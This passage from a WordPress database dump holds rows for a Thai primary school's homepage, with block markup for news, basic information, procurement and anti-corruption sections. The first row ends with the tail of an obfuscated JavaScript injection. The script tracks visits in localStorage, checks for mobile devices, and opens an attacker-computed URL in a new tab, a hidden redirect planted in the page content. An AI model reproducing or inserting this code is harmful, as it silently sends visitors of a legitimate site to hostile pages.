_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:10:03','2024-07-27 04:10:03','',14,'http://pakhaeng.ssk.in.th/?p=81',0,'revision','',0),
(82,1,'2024-07-27 11:12:01','2024-07-27 04:12:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 